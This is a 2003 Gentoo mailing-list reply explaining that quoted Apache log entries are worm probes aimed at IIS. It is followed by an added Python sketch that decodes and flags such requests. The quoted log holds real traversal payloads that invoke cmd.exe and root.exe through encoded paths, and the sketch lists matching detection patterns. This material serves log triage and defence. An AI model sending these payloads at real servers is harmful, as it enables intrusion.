Hello: The log you sent us is completely normal. It comes from a worm. Linux and Apache are safe. (Perhaps if you administer an IIS you could have problems.)
-------
Best regards
Manuel Pérez López
[EMAIL PROTECTED]
http://www.ieduca.net/
************************
Gentoo Linux:
Portage 2.0.49
gcc 3.2.3
Linux 2.6.0
************************

On Wednesday, 31 December 2003 11:18, Aaron Walker wrote:
> A week or so ago, I set up my cable router/firewall to forward port 80 to
> one of my machines so I could run Apache. Last night while at work, I
> checked to see if it worked, and it did. So just now, I went to check
> out the access_log and noticed some funny looking stuff, that doesn't
> look like normal activity....
>
> <snipped from /var/log/apache2/access_log>
>
> 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
>
> Is this someone trying to exploit apache?
>
> Thanks,
> Aaron

--
[EMAIL PROTECTED] mailing list
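
A triage sketch for the kind of entries quoted in this thread, added here as an example and not part of either poster's message: it percent-decodes each request target repeatedly, tags IIS-style probes, and lists any that the server did not reject. The sample lines are constructed, the client addresses are documentation placeholders, and the names `triage`, `decode_target` and `SIGNATURES` are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample (Apache combined format) modelled on the quoted entries;
# the client addresses are documentation-range placeholders.
SAMPLE_LOG = """
198.51.100.7 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
203.0.113.20 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
203.0.113.20 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
203.0.113.20 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
203.0.113.99 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
192.0.2.10 - - [30/Dec/2003:09:00:00 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# The protocol token is optional: the last probe above sends none.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)(?: \S+)?" (\d{3}) ')
SIGNATURES = {
    "windows-shell": re.compile(r"(cmd|root)\.exe", re.I),
    "iis-isapi": re.compile(r"nsiislog\.dll", re.I),
    "traversal": re.compile(r"\.\.[\\/]"),
    "overlong-utf8": re.compile(r"[\xc0\xc1]"),  # lead bytes that are never valid UTF-8
}

def decode_target(target, max_rounds=3):
    """Percent-decode repeatedly so %255c and %%35c both collapse to a backslash."""
    for _ in range(max_rounds):
        decoded = unquote(target, encoding="latin-1")  # latin-1 keeps raw byte values
        if decoded == target:
            break
        target = decoded
    return target

def triage(log_text):
    """Return {client: {"probes": n, "tags": set, "served": [targets with status < 400]}}."""
    report = defaultdict(lambda: {"probes": 0, "tags": set(), "served": []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        decoded = decode_target(target)
        tags = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
        if tags:
            entry = report[client]
            entry["probes"] += 1
            entry["tags"] |= tags
            if int(status) < 400:  # a probe that was not rejected deserves a closer look
                entry["served"].append(target)
    return dict(report)
```

An empty `served` list for every client corresponds to the all-4xx/5xx pattern in the quoted log.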
